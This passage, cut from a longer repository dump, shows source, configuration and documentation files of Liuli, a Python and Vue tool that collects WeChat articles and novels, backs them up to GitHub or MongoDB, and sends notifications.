ICommonResp { 17 | data:{} 18 | } 19 | 20 | export interface ISearchBMParams extends IBookMark, IPage { 21 | username:string; 22 | } 23 | 24 | export interface ISearchBMResp extends ICommonResp { 25 | data:{ 26 | rows: IBookMark[]; 27 | total: number; 28 | } 29 | } 30 | 31 | export interface IGetTagListParams { 32 | username:string; 33 | tag: string; 34 | } 35 | 36 | export interface IGetTagListResp extends ICommonResp { 37 | data:{tag:string;updated_at:number} [] 38 | } 39 | -------------------------------------------------------------------------------- /src/sender/send_factory.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python 2 | """ 3 | Created by howie.hu at 2021/4/10. 4 | Description:分发器工厂,支持分发终端如下: 5 | - 钉钉 6 | - 企业微信 7 | - TG 8 | - Bark 9 | Changelog: all notable changes to this file will be documented 10 | """ 11 | 12 | from importlib import import_module 13 | 14 | from src.utils import LOGGER 15 | 16 | 17 | def send_factory(send_type: str, init_config: dict, send_data: dict) -> bool: 18 | """ 19 | 分发器工厂函数 20 | :param send_type: 下发终端类型 21 | :param init_config: 下发终端配置 22 | :param send_data: 下发内容字典,字段开发者自定义 23 | :return: 24 | """ 25 | send_status = False 26 | try: 27 | send_module = import_module(f"src.sender.{send_type}_sender") 28 | send_status = send_module.send(init_config, send_data) 29 | except ModuleNotFoundError: 30 | LOGGER.error(f"目标终端类型不存在 {send_type} - {init_config} - {send_data}") 31 | return send_status 32 | -------------------------------------------------------------------------------- /.github/workflows/release.yml: -------------------------------------------------------------------------------- 1 | name: Release 2 | on: 3 | push: 4 | tags: 5 | - 'v*' 6 | workflow_dispatch: 7 | 8 | jobs: 9 | build: 10 | runs-on: ubuntu-latest 11 | steps: 12 | - uses: actions/checkout@v2 13 | 14 | - name: Publish to Registry (schedule) 15 | uses: elgohr/Publish-Docker-Github-Action@master 16 | with: 17 | name: liuliio/schedule 18 | username: ${{ secrets.DOCKER_USERNAME }} 19 | password: ${{ secrets.DOCKER_PASSWORD }} 20 | tag_names: true 21 | dockerfile: schedule.Dockerfile 22 | buildoptions: "--no-cache=true" 23 | 24 | - name: Publish to Registry 25 | uses: elgohr/Publish-Docker-Github-Action@master 26 | with: 27 | name: liuliio/schedule (api) 28 | username: ${{ secrets.DOCKER_USERNAME }} 29 | password: ${{ secrets.DOCKER_PASSWORD }} 30 | tag_names: true 31 | dockerfile: api.Dockerfile 32 | buildoptions: "--no-cache=true" 33 | -------------------------------------------------------------------------------- /start.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | s_type=$1 4 | s_env=$2 5 | 6 | if [ ${s_type} == "api" ] 7 | then 8 | script_command="gunicorn -c src/config/gunicorn.py src.api.http_app:app" 9 | elif [ ${s_type} == "schedule" ] 10 | then 11 | script_command="python src/liuli_schedule.py" 12 | else 13 | echo "Service type doesn't exist: "$s_type 14 | exit 15 | fi 16 | 17 | if [ ${s_env} == "local" ] 18 | then 19 | start_script="PIPENV_DOTENV_LOCATION=./.env pipenv run "$script_command 20 | elif [ ${s_env} == "dev" ] 21 | then 22 | start_script="PIPENV_DOTENV_LOCATION=./dev.env pipenv run "$script_command 23 | elif [ ${s_env} == "pro" ] 24 | then 25 | start_script="PIPENV_DOTENV_LOCATION=./pro.env pipenv run "$script_command 26 | elif [ ${s_env} == "online" ] 27 | then 28 | start_script="PIPENV_DOTENV_LOCATION=./online.env pipenv run "$script_command 29 | else 30 | echo "Environment variable type doesn't exist: "$s_type 31 | exit 32 | fi 33 | 34 | echo "Start "$s_type"("$s_env") serve: "$start_script 35 | eval $start_script 36 | -------------------------------------------------------------------------------- /liuli_web/src/assets/icons/svg/liuli_svg/side_bar/link.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Pipfile: -------------------------------------------------------------------------------- 1 | [[source]] 2 | name = "pypi" 3 | verify_ssl = true 4 | url = "https://pypi.douban.com/simple/" 5 | 6 | [packages] 7 | # Common 8 | pymongo = "*" 9 | html5lib = "*" 10 | bs4 = "*" 11 | cchardet = "*" 12 | readability-lxml = "*" 13 | html2text = "*" 14 | requests = "*" 15 | jieba = "*" 16 | pytz = "*" 17 | # Schedule 18 | ruia = ">=0.8.3" 19 | ruia-ua = "*" 20 | xmltodict = "*" 21 | schedule = "*" 22 | feedgen = "*" 23 | pygithub = "*" 24 | feedparser = "*" 25 | 26 | [dev-packages] 27 | black = "*" 28 | isort = "*" 29 | pylint = "*" 30 | pytest = "*" 31 | pandas = "*" 32 | numpy = "*" 33 | pypinyin = "*" 34 | playwright = "*" 35 | flask = "==2.0.2" 36 | gunicorn = "==20.1.0" 37 | gevent = "==21.12.0" 38 | flask-jwt-extended = "==4.3.1" 39 | pyexecjs = "*" 40 | 41 | [scripts] 42 | local_schedule = "bash ./start.sh schedule local" 43 | dev_schedule = "bash ./start.sh schedule dev" 44 | pro_schedule = "bash ./start.sh schedule pro" 45 | local_api = "bash ./start.sh api local" 46 | dev_api = "bash ./start.sh api dev" 47 | pro_api = "bash ./start.sh api pro" 48 | -------------------------------------------------------------------------------- /liuli_web/src/main.ts: -------------------------------------------------------------------------------- 1 | import * as ElementPlusIconsVue from '@element-plus/icons-vue'; 2 | import svgIcon from '@/components/svgIcon/index.vue'; 3 | 4 | // 导入 CSS 库 5 | import './style/index.scss'; 6 | import ElementPlus from 'element-plus'; 7 | import 'element-plus/dist/index.css'; 8 | import 'virtual:svg-icons-register'; 9 | 10 | // 导入自定义模块 11 | import App from '@/App.vue' 12 | import router from '@/router'; 13 | import pinia from '@/store'; 14 | import { createApp } from 'vue'; 15 | import dayjs from 'dayjs'; // 时间格式化库 16 | import 'dayjs/locale/zh-cn'; // import locale 17 | import relativeTime from 'dayjs/plugin/relativeTime' //相对时间插件 18 | 19 | 20 | const app = createApp(App); 21 | 22 | app.component('SvgIcon', svgIcon); 23 | 24 | dayjs.locale('zh-cn'); // use locale 25 | dayjs.extend(relativeTime) 26 | 27 | // 挂载 router 28 | app.use(router); 29 | // 注册el-plus组件 30 | app.use(ElementPlus); 31 | // 注册el -icons 32 | for (const [key, component] of Object.entries(ElementPlusIconsVue)) { 33 | app.component(key, component); 34 | } 35 | // 挂载 pinia 36 | app.use(pinia); 37 | // 绑定 38 | app.mount('#app'); 39 | -------------------------------------------------------------------------------- /docs/04.备份器配置.md: -------------------------------------------------------------------------------- 1 | # Liuli 备份器配置 2 | 3 | 目前备份器支持类型如下: 4 | - GitHub 5 | - MongoDB(默认支持): 直接使用即可,无需配置 6 | 7 | ## GitHub 8 | 9 | `GitHub`备份器需要用户进行配置,流程如下: 10 | 11 | **1、生成Token** 12 | 13 | `GitHub`仓库数据同步需要[生成Token](https://github.com/settings/tokens/new)(权限请勾选 repo 和 user): 14 | 15 |  16 | 17 | 获取的`Token`请填写到`LL_GITHUB_TOKEN`。 18 | 19 | **2、建立`liuli_backup`仓库** 20 | 21 | 需要建立名为`liuli_backup`的仓库保存文章: 22 | 23 |  24 | 25 | 创建成功后,点`https://github.com/{your_github_name}/liuli_backup/settings`进行配置,然后下拉找到`GitHub Pages`: 26 | 27 |  28 | 点击Check it out here!,实际上就是访问`https://github.com/{your_github_name}/liuli_backup/settings/pages`进行相关设置,操作如下图: 29 | 30 |  31 | 32 | 最后在`pro.env`填写一下变量即可({your_github_name} 替换成自己的): 33 | 34 | ```env 35 | LL_GITHUB_REPO="{your_github_name}/liuli_backup" 36 | LL_GITHUB_DOMAIN="https://{your_github_name}.github.io/liuli_backup/" 37 | ``` 38 | -------------------------------------------------------------------------------- /src/common/doc_utils.py: -------------------------------------------------------------------------------- 1 | """ 2 | Created by howie.hu at 2022-02-09. 3 | Description: 文档元数据相关通用函数 4 | Changelog: all notable changes to this file will be documented 5 | """ 6 | from urllib.parse import quote 7 | 8 | from src.config import Config 9 | from src.utils import get_ip 10 | 11 | 12 | def get_bak_doc_link(link_source: str, doc_data: dict) -> str: 13 | """返回不同存储器下的 href 14 | 15 | Args: 16 | link_source (str): 链接返回规则类型 17 | doc_data (dict): 文章数据 18 | """ 19 | doc_source = doc_data["doc_source"] 20 | doc_source_name = doc_data["doc_source_name"] 21 | doc_name = quote(doc_data["doc_name"]) 22 | 23 | if link_source == "github": 24 | github_domain = Config.LL_GITHUB_DOMAIN 25 | doc_link = f"{github_domain}/{doc_source}/{doc_source_name}/{doc_name}.html" 26 | elif link_source == "mongodb": 27 | domain: str = Config.LL_DOMAIN or f"{get_ip()}:{Config.LL_HTTP_PORT}" 28 | doc_link = f"{domain}/backup/{doc_source}/{doc_source_name}/{doc_name}" 29 | else: 30 | doc_link = doc_data["doc_link"] 31 | 32 | return doc_link 33 | -------------------------------------------------------------------------------- /docker-compose.yaml: -------------------------------------------------------------------------------- 1 | version: "3" 2 | services: 3 | liuli_api: 4 | image: liuliio/api:v0.1.4 5 | restart: always 6 | container_name: liuli_api 7 | ports: 8 | - "8765:8765" 9 | volumes: 10 | - ./pro.env:/data/code/pro.env 11 | depends_on: 12 | - liuli_mongodb 13 | networks: 14 | - liuli-network 15 | liuli_schedule: 16 | image: liuliio/schedule:v0.2.4 17 | restart: always 18 | container_name: liuli_schedule 19 | volumes: 20 | - ./pro.env:/data/code/pro.env 21 | - ./liuli_config:/data/code/liuli_config 22 | depends_on: 23 | - liuli_mongodb 24 | networks: 25 | - liuli-network 26 | liuli_mongodb: 27 | image: mongo:3.6 28 | restart: always 29 | container_name: liuli_mongodb 30 | environment: 31 | - MONGO_INITDB_ROOT_USERNAME=liuli 32 | - MONGO_INITDB_ROOT_PASSWORD=liuli 33 | ports: 34 | - "27027:27017" 35 | volumes: 36 | - ./mongodb_data:/data/db 37 | command: mongod 38 | networks: 39 | - liuli-network 40 | 41 | networks: 42 | liuli-network: 43 | driver: bridge 44 | -------------------------------------------------------------------------------- /src/classifier/model_factory.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | """ 3 | Created by howie.hu at 2021-04-08. 4 | Description:模型预测工厂 5 | Changelog: all notable changes to this file will be documented 6 | """ 7 | from importlib import import_module 8 | 9 | from src.classifier.model_base.base import ModelResponse 10 | 11 | 12 | def model_predict_factory( 13 | model_name: str, model_path: str, input_dict: dict 14 | ) -> ModelResponse: 15 | """ 16 | 模型预测工厂函数 17 | :param model_name: 18 | :param model_path: 19 | :param input_dict: 20 | :return: 21 | """ 22 | try: 23 | predict_module = import_module(f"src.classifier.{model_name}_predict") 24 | model_response = predict_module.predict(model_name, model_path, input_dict) 25 | except ModuleNotFoundError: 26 | raise ValueError(f"模型不存在 {model_name} - {model_path}") 27 | return model_response 28 | 29 | 30 | if __name__ == "__main__": 31 | model_response = model_predict_factory( 32 | model_name="cos", model_path="", input_dict={"text": "毕业的4年,我用睡后收入买了两套房"} 33 | ) 34 | print(model_response.to_dict()) 35 | -------------------------------------------------------------------------------- /src/classifier/model_lib/char_cnn/keras_utils.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | """ 3 | Created by howie.hu at 2021/4/25. 4 | Description:keras 回调钩子 5 | Changelog: all notable changes to this file will be documented 6 | """ 7 | 8 | from keras.callbacks import Callback 9 | 10 | 11 | class FitCallback(Callback): 12 | def __init__(self, *, test_data: tuple, evaluate_every: int = 100): 13 | super(FitCallback, self).__init__() 14 | if test_data is None: 15 | raise ValueError("test_data is expected") 16 | self.test_data = test_data 17 | self.evaluate_every = evaluate_every 18 | 19 | def on_batch_end(self, batch, logs={}): 20 | # 批量训练开始函数 21 | if self.evaluate_every > 0: 22 | if (int(batch) + 1) % self.evaluate_every == 0: 23 | x, y = self.test_data 24 | result = self.model.evaluate(x, y, verbose=0) 25 | print("\n") 26 | print( 27 | f"Iter: {int(batch) + 1}, Val Loss: {result[0]}, Val Acc: {result[1]}" 28 | ) 29 | 30 | def on_epoch_end(self, epoch, logs={}): 31 | # 每次迭代结束 32 | pass 33 | -------------------------------------------------------------------------------- /src/collector/wechat/items/data258_wechat_item.py: -------------------------------------------------------------------------------- 1 | """ 2 | Created by howie.hu at 2022-06-05. 3 | Description: 基于 Ruia 爬虫框架的 data258 微信页面 Item 提取类 4 | Changelog: all notable changes to this file will be documented 5 | """ 6 | 7 | from ruia import AttrField, Item, TextField 8 | 9 | 10 | class Data258WechatItem(Item): 11 | """ 12 | 微阅读公众号搜索一级页面信息提取 13 | 示例:https://mp.data258.com/mp/search?type=category&key=老胡的储物柜&sort= 14 | """ 15 | 16 | target_item = TextField(css_select="div.layui-panel") 17 | wechat_name = TextField(css_select="h2>a", default="") 18 | wehcat_href = AttrField(css_select="h2>a", attr="href", default="") 19 | 20 | 21 | class Data258WechatListItem(Item): 22 | """ 23 | 微阅读公众号历史文章信息提取 24 | 示例: https://mp.data258.com/article/category/howie_locker 25 | """ 26 | 27 | target_item = TextField(css_select="ul.jie-row>li") 28 | w_article_title = TextField(css_select="a.jie-title", default="") 29 | w_article_href = AttrField(css_select="a.jie-title", attr="href", default="") 30 | 31 | async def clean_w_article_title(self, value: list): 32 | """获取文章标题""" 33 | return str(value).strip() if value else "" 34 | -------------------------------------------------------------------------------- /src/collector/wechat/start.py: -------------------------------------------------------------------------------- 1 | """ 2 | Created by howie.hu at 2022-01-14. 3 | Description: 搜狗微信爬虫启动函数 4 | Changelog: all notable changes to this file will be documented 5 | """ 6 | 7 | 8 | def run(collect_config: dict): 9 | """微信公众号文章抓取爬虫 10 | 11 | Args: 12 | collect_config (dict, optional): 采集器配置 13 | """ 14 | spider_type = collect_config.get("spider_type", "ruia") 15 | if spider_type == "ruia" or spider_type == "sg_ruia": 16 | from src.collector.wechat.sg_ruia_start import run as ruia_run 17 | 18 | run_func = ruia_run 19 | elif spider_type == "playwright" or spider_type == "sg_playwright": 20 | from src.collector.wechat.sg_playwright_start import run as playwright_run 21 | 22 | run_func = playwright_run 23 | elif spider_type == "feeddd": 24 | from src.collector.wechat.feeddd_start import run as feeddd_run 25 | 26 | run_func = feeddd_run 27 | elif spider_type == "data258": 28 | from src.collector.wechat.data258_ruia_start import run as data258_run 29 | 30 | run_func = data258_run 31 | else: 32 | run_func = ruia_run 33 | 34 | # 启动 35 | run_func(collect_config) 36 | -------------------------------------------------------------------------------- /src/backup/backup_factory.py: -------------------------------------------------------------------------------- 1 | """ 2 | Created by howie.hu at 2022-01-16. 3 | Description: 备份器工厂 4 | 支持备份方式如下: 5 | - Github 6 | - MongoDB 7 | 命令:PIPENV_DOTENV_LOCATION=./pro.env pipenv run python src/backup/backup_factory.py 8 | Changelog: all notable changes to this file will be documented 9 | """ 10 | 11 | 12 | from importlib import import_module 13 | 14 | from src.backup.base import BackupBase 15 | from src.utils import LOGGER 16 | from src.utils.tools import string_camelcase 17 | 18 | 19 | def backup_factory(backup_type: str, init_config: dict) -> BackupBase: 20 | """ 21 | 备份器工厂函数 22 | :param backup_type: 备份类型 23 | :param init_config: 备份配置 24 | :return: 25 | """ 26 | backup_ins = None 27 | try: 28 | backup_class_name = f"{backup_type}_backup" 29 | backup_module = import_module(f"src.backup.{backup_class_name}") 30 | # 备份类实例化 31 | backup_ins = getattr(backup_module, string_camelcase(backup_class_name))( 32 | init_config=init_config 33 | ) 34 | except ModuleNotFoundError as e: 35 | LOGGER.error(f"目标备份类型不存在 {backup_type} - {init_config} - {e}") 36 | return backup_ins 37 | -------------------------------------------------------------------------------- /liuli_config/book.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "book", 3 | "username": "liuli", 4 | "author": "liuli_team", 5 | "doc_source": "liuli_book", 6 | "doc_source_alias_name": "小说源", 7 | "collector": { 8 | "book_common": { 9 | "book_dict": { 10 | "诡秘之主": "https://www.yruan.com/article/38563.html" 11 | }, 12 | "delta_time": 3, 13 | "latest_chapter_nums": 3 14 | } 15 | }, 16 | "processor": { 17 | "before_collect": [], 18 | "after_collect": [ 19 | { 20 | "func": "to_rss", 21 | "link_source": "github", 22 | "rss_count": 20 23 | } 24 | ] 25 | }, 26 | "sender": { 27 | "sender_list": ["wecom"], 28 | "query_days": 1, 29 | "delta_time": 3, 30 | "link_source": "github" 31 | }, 32 | "backup": { 33 | "backup_list": ["github", "mongodb"], 34 | "query_days": 1, 35 | "delta_time": 3, 36 | "doc_html_dict": { 37 | "liuli_book": "book" 38 | }, 39 | "init_config": { 40 | "force_backup": true 41 | }, 42 | "after_get_content": [ 43 | { 44 | "func": "str_replace", 45 | "before_str": "本书首发", 46 | "after_str": "" 47 | } 48 | ] 49 | }, 50 | "schedule": { 51 | "period_list": ["00:10", "12:10", "21:10"] 52 | } 53 | } 54 | -------------------------------------------------------------------------------- /liuli_web/src/style/global.scss: -------------------------------------------------------------------------------- 1 | .app-content { 2 | margin: 0; 3 | // background-color: white; 4 | border-radius: 15px; 5 | min-height: calc(100vh - 100px); 6 | height: 100%; 7 | padding: 20px; 8 | } 9 | 10 | div, 11 | section { 12 | outline:none; 13 | margin-bottom: 0px; 14 | box-sizing: border-box; 15 | } 16 | 17 | html, 18 | body { 19 | height: 100%; 20 | background-color: #f2f4f7; 21 | --block-spacing-vertical: 0rem !important; 22 | --el-header-padding: 0px !important; 23 | } 24 | 25 | .content { 26 | margin-left: 250px; 27 | } 28 | 29 | a { 30 | text-decoration: none; 31 | } 32 | 33 | .el-header { 34 | padding: 0 !important; 35 | } 36 | 37 | .el-menu { 38 | border-right: 0px !important; 39 | } 40 | 41 | div, 42 | section { 43 | margin-bottom: 0px; 44 | box-sizing: border-box; 45 | } 46 | 47 | .scroll-box::-webkit-scrollbar { 48 | width: 4px; 49 | // height: 10px; // 高度写不写,都不影响,因为会根据内容的长度自动计算 50 | } 51 | 52 | .scroll-box::-webkit-scrollbar-thumb { 53 | background: #e6e9ec; // 滑块颜色 54 | border-radius: 5px; // 滑块圆角 55 | } 56 | 57 | .scroll-box::-webkit-scrollbar-thumb:hover { 58 | background: #ccc; // 鼠标移入滑块变红 59 | } 60 | 61 | .scroll-box::-webkit-scrollbar-track { 62 | border-radius: 10px; // 轨道圆角 63 | // background-color: #1890ff // 轨道颜色 64 | } 65 | -------------------------------------------------------------------------------- /src/collector/collect_factory.py: -------------------------------------------------------------------------------- 1 | """ 2 | Created by howie.hu at 2022-01-05. 3 | Description: 采集器工厂函数,根据采集模块名称启动主函数 4 | - 命令: pipenv run python src/collector/collect_factory.py 5 | Changelog: all notable changes to this file will be documented 6 | """ 7 | 8 | from importlib import import_module 9 | 10 | from src.utils import LOGGER 11 | 12 | 13 | def collect_factory(collect_type: str, collect_config: dict) -> bool: 14 | """ 15 | 采集器工厂函数 16 | :param collect_type: 采集器类型 17 | :param collect_config: 采集器配置 18 | :return: 19 | """ 20 | collect_status = False 21 | try: 22 | collect_module = import_module(f"src.collector.{collect_type}") 23 | collect_status = collect_module.run(collect_config) 24 | except ModuleNotFoundError as e: 25 | LOGGER.error(f"采集器类型不存在 {collect_type} - {collect_config} -{e}") 26 | except Exception as e: 27 | LOGGER.error(f"采集器执行出错 {collect_type} - {collect_config} - {e}") 28 | return collect_status 29 | 30 | 31 | if __name__ == "__main__": 32 | t_collect_type = "wechat" 33 | t_collect_config = { 34 | "wechat_list": ["老胡的储物柜"], 35 | "delta_time": 10, 36 | "spider_type": "ruia", 37 | "doc_source": "liuli_wechat", 38 | } 39 | collect_factory(t_collect_type, t_collect_config) 40 | -------------------------------------------------------------------------------- /liuli_web/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "liuli_web", 3 | "private": true, 4 | "main": "./index", 5 | "version": "0.0.0", 6 | "scripts": { 7 | "dev": "vite", 8 | "build": "vite build", 9 | "preview": "vite preview" 10 | }, 11 | "dependencies": { 12 | "@element-plus/icons-vue": "^2.0.10", 13 | "@fortawesome/fontawesome-free": "^6.2.1", 14 | "axios": "^0.27.2", 15 | "element-plus": "^2.2.12", 16 | "dayjs": "^1.11.4", 17 | "path-browserify": "^1.0.1", 18 | "pinia": "^2.0.9", 19 | "pinia-plugin-persistedstate": "^1.6.3", 20 | "pinyin-pro": "^3.13.2", 21 | "vue": "^3.2.25", 22 | "vue-json-pretty": "^2.2.3", 23 | "vue-router": "^4.0.14" 24 | }, 25 | "devDependencies": { 26 | "@tailwindcss/line-clamp": "^0.4.2", 27 | "@types/node": "^18.15.11", 28 | "@types/path-browserify": "^1.0.0", 29 | "@typescript-eslint/eslint-plugin": "^5.10.0", 30 | "@typescript-eslint/parser": "^5.10.0", 31 | "@vitejs/plugin-vue": "^2.3.1", 32 | "autoprefixer": "^10.4.13", 33 | "fast-glob": "^3.2.12", 34 | "postcss": "^8.4.21", 35 | "sass": "^1.57.1", 36 | "sass-loader": "^13.2.0", 37 | "tailwindcss": "^3.2.6", 38 | "typescript": "^4.4.4", 39 | "vite": "^2.9.0", 40 | "vite-plugin-svg-icons": "^2.0.1", 41 | "vue-tsc": "^0.40.4", 42 | "tslib": "^2.5.0" 43 | } 44 | } -------------------------------------------------------------------------------- /.vscode/launch.json: -------------------------------------------------------------------------------- 1 | { 2 | // Use IntelliSense to learn about possible attributes. 3 | // Hover to view descriptions of existing attributes. 4 | // For more information, visit: https://go.microsoft.com/fwlink/?linkid=830387 5 | "version": "0.2.0", 6 | "configurations": [ 7 | { 8 | "name": "Python: Current File", 9 | "type": "python", 10 | "request": "launch", 11 | "program": "${file}", 12 | "console": "integratedTerminal" 13 | }, 14 | { 15 | "name": "Python: Flask", 16 | "type": "python", 17 | "request": "launch", 18 | // "module": "flask", 19 | // "stopOnEntry": false, 20 | "program": "${workspaceRoot}/src/http_app.py", 21 | "cwd": "${workspaceRoot}", 22 | "env": { 23 | "FLASK_APP": "${workspaceRoot}/src/http_app.py", 24 | "FLASK_DEBUG": "0" 25 | }, 26 | "args": [ 27 | "run", 28 | "--no-debugger", 29 | // "--no-reload" 30 | ], 31 | "envFile": "${workspaceRoot}/.env", 32 | "debugOptions": [ 33 | "WaitOnAbnormalExit", 34 | "WaitOnNormalExit", 35 | "RedirectOutput" 36 | ] 37 | }, 38 | ] 39 | } -------------------------------------------------------------------------------- /liuli_web/src/assets/icons/svg/subscription.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /liuli_web/src/assets/images/home/subscription.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /liuli_web/src/assets/icons/svg/favorite.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /liuli_web/src/assets/images/home/favorite.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /src/sender/base.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | """ 3 | Created by howie.hu at 2021/4/10. 4 | Description:分发器父类 5 | Changelog: all notable changes to this file will be documented 6 | """ 7 | from src.config import Config 8 | from src.databases import MongodbManager 9 | 10 | 11 | class SenderBase: 12 | """ 13 | 分发器父类 14 | :return: 15 | """ 16 | 17 | def __init__(self, send_type: str, init_config: dict): 18 | """ 19 | 初始化相关配置 20 | :param send_type: 下发目标类型 21 | :param init_config: 下发目标类型相关配置,如密钥之类 22 | """ 23 | self.send_type = send_type 24 | self.init_config = init_config 25 | # 初始化数据库 26 | self.mongo_base = MongodbManager.get_mongo_base( 27 | mongodb_config=Config.LL_MONGODB_CONFIG 28 | ) 29 | # liuli_send_list 存储所有已经下发过的文章列表,可以当做缓存表 30 | self.sl_coll = self.mongo_base.get_collection(coll_name="liuli_send_list") 31 | 32 | def is_send(self, doc_id: str) -> bool: 33 | """ 34 | 判断文章是在此类型下发过 35 | :param doc_id: 36 | :return: 37 | """ 38 | curl = self.sl_coll.find({"doc_id": doc_id, "send_type": self.send_type}) 39 | return True if list(curl) else False 40 | 41 | def send(self, send_data) -> bool: 42 | """ 43 | 执行下发动作,每个子类必须实现的方法 44 | :param send_data: 发送列表 45 | :return: 46 | """ 47 | raise NotImplementedError 48 | -------------------------------------------------------------------------------- /src/api/views/api/action/gen_backup.py: -------------------------------------------------------------------------------- 1 | """ 2 | Created by howie.hu at 2023-03-26. 3 | Description: 对数据源进行备份 4 | Changelog: all notable changes to this file will be documented 5 | """ 6 | 7 | 8 | from flask import current_app, request 9 | 10 | from src.api.common import ( 11 | ResponseCode, 12 | ResponseField, 13 | ResponseReply, 14 | UniResponse, 15 | jwt_required, 16 | response_handle, 17 | ) 18 | from src.backup.action import backup_doc 19 | 20 | 21 | @jwt_required() 22 | def action_gen_backup(): 23 | """对数据源进行备份 24 | eg: 25 | { 26 | "username": "liuli", 27 | "doc_source": "liuli_wechat_sg", 28 | "doc_source_name": "老胡的储物柜" 29 | } 30 | Returns: 31 | Response: 响应类 32 | """ 33 | # TODO 重构,基于 liuli_doc_source 读取数据 34 | app_logger = current_app.config["app_logger"] 35 | # 获取基础数据 36 | post_data: dict = request.json 37 | del post_data["username"] 38 | result = UniResponse.SUCCESS 39 | try: 40 | backup_doc(post_data) 41 | except Exception as e: 42 | result = { 43 | ResponseField.DATA: {}, 44 | ResponseField.MESSAGE: ResponseReply.GEN_BACKUP_FAILED, 45 | ResponseField.STATUS: ResponseCode.GEN_BACKUP_FAILED, 46 | } 47 | err_info = f"gen backup failed! response info -> {e}" 48 | app_logger.error(err_info) 49 | return response_handle(request=request, dict_value=result) 50 | -------------------------------------------------------------------------------- /liuli_config/wechat.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "wechat", 3 | "username": "liuli", 4 | "author": "liuli_team", 5 | "doc_source": "liuli_wechat_sg", 6 | "doc_source_alias_name": "微信源(搜狗)", 7 | "collector": { 8 | "wechat": { 9 | "wechat_list": ["老胡的储物柜", "是不是很酷"], 10 | "delta_time": 5, 11 | "spider_type": "sg_ruia", 12 | "spider_type_des": "当镜像是schedule:playwright_*时,spider_type可填写sg_playwright" 13 | } 14 | }, 15 | "processor": { 16 | "before_collect": [], 17 | "after_collect": [ 18 | { 19 | "func": "ad_marker", 20 | "cos_value": 0.6 21 | }, 22 | { 23 | "func": "to_rss", 24 | "doc_source_list": ["liuli_wechat"], 25 | "link_source": "github" 26 | } 27 | ] 28 | }, 29 | "sender": { 30 | "sender_list": ["wecom"], 31 | "query_days": 7, 32 | "delta_time": 3, 33 | "custom_filter": { 34 | "wecom": { 35 | "delta_time": 1, 36 | "ignore_doc_source_name": [""] 37 | } 38 | } 39 | }, 40 | "backup": { 41 | "backup_list": ["github", "mongodb"], 42 | "query_days": 7, 43 | "delta_time": 3, 44 | "init_config": {}, 45 | "after_get_content": [ 46 | { 47 | "func": "str_replace", 48 | "before_str": "data-src=\"", 49 | "after_str": "src=\"https://images.weserv.nl/?url=" 50 | } 51 | ] 52 | }, 53 | "schedule": { 54 | "period_list": ["00:10", "12:10", "21:10"] 55 | } 56 | } 57 | -------------------------------------------------------------------------------- /src/classifier/model_lib/char_cnn/config.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | """ 3 | Created by howie.hu at 2021/4/25. 4 | Description: 5 | Changelog: all notable changes to this file will be documented 6 | """ 7 | 8 | import os 9 | 10 | from keras.optimizers import SGD 11 | 12 | 13 | class Config: 14 | """ 15 | 模型基本配置 16 | """ 17 | 18 | base_dir = os.path.dirname(os.path.dirname(__file__)) 19 | # 字母表 20 | alphabet = """i(,l)h《$9a~“g」”』~.?j7·x)—;}'》k`|&>rvf5*0q:de{/":?w3,_ys#|^8-『】[41%!<「bn+(om…6【tp=!c@uz]\2""" 21 | alphabet_size = len(alphabet) 22 | # 输入大小,即论文中的l0 23 | input_size = 128 24 | # 训练集类别 25 | num_of_classes = 2 26 | 27 | # 批大小 28 | batch_size = 12 29 | # 迭代次数 30 | epochs = 20 31 | 32 | # 每多少次 checkpoint 33 | checkpoint_every = 100 34 | # 每个迭代周期里面每多少次batch计算一次 0 表示不计算 35 | evaluate_every = 200 36 | 37 | # 激活函数的 threshold 值 38 | threshold = 1e-6 39 | # 防止过拟合 40 | dropout_p = 0.5 41 | 42 | # 卷积层配置 43 | conv_layers = [ 44 | [256, 7, 3], 45 | [256, 7, 3], 46 | [256, 3, None], 47 | [256, 3, None], 48 | [256, 3, None], 49 | [256, 3, 3], 50 | ] 51 | 52 | # 全连接层配置 53 | fully_layers = [1024, 1024] 54 | 55 | # Keras 参数配置 56 | sgd = SGD(lr=0.001) 57 | # 损失函数 58 | loss = "categorical_crossentropy" 59 | # 优化器 rmsprop adam 60 | optimizer = "adam" 61 | # Keras 日志输出配置 62 | verbose = 1 63 | -------------------------------------------------------------------------------- /liuli_web/src/views/ConfigManage/index.vue: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 45 | 46 | 47 | 48 | 49 | -------------------------------------------------------------------------------- /docs/接口文档/02.接口说明[stats].md: -------------------------------------------------------------------------------- 1 | ## 获取所有文档源统计信息 2 | 3 | ### 描述 4 | 5 | 获取所有文档源统计信息 6 | 7 | ### URL路径 8 | 9 | /stats/source_list 10 | 11 | ### 请求方式 12 | 13 | POST 14 | 15 | ### 请求参数 16 | 17 | | 参数名 | 类型 | 必选 | 描述 | 18 | | -------- | ------ | ---- | ------ | 19 | | username | string | 是 | 用户名 | 20 | 21 | ### 返回参数 22 | 23 | 响应返回的是接口标准的通用响应 24 | 25 | ### 请求示例 26 | 27 | ```json 28 | { 29 | "username": "liuli" 30 | } 31 | ``` 32 | 33 | ### 返回示例 34 | 35 | #### 成功示例 36 | 37 | ```json 38 | { 39 | "data": { 40 | "doc_counts": 3, 41 | "doc_source_counts": 3, 42 | "doc_source_stats_dict": { 43 | "liuli_book": { 44 | "counts": 0, 45 | "doc_source_alias_name": "小说源", 46 | "rows": [], 47 | "rows_info": [] 48 | }, 49 | "liuli_wechat_feeddd": { 50 | "counts": 0, 51 | "doc_source_alias_name": "微信源(feeddd)", 52 | "rows": [], 53 | "rows_info": [] 54 | }, 55 | "liuli_wechat_sg": { 56 | "counts": 0, 57 | "doc_source_alias_name": "微信源(搜狗)", 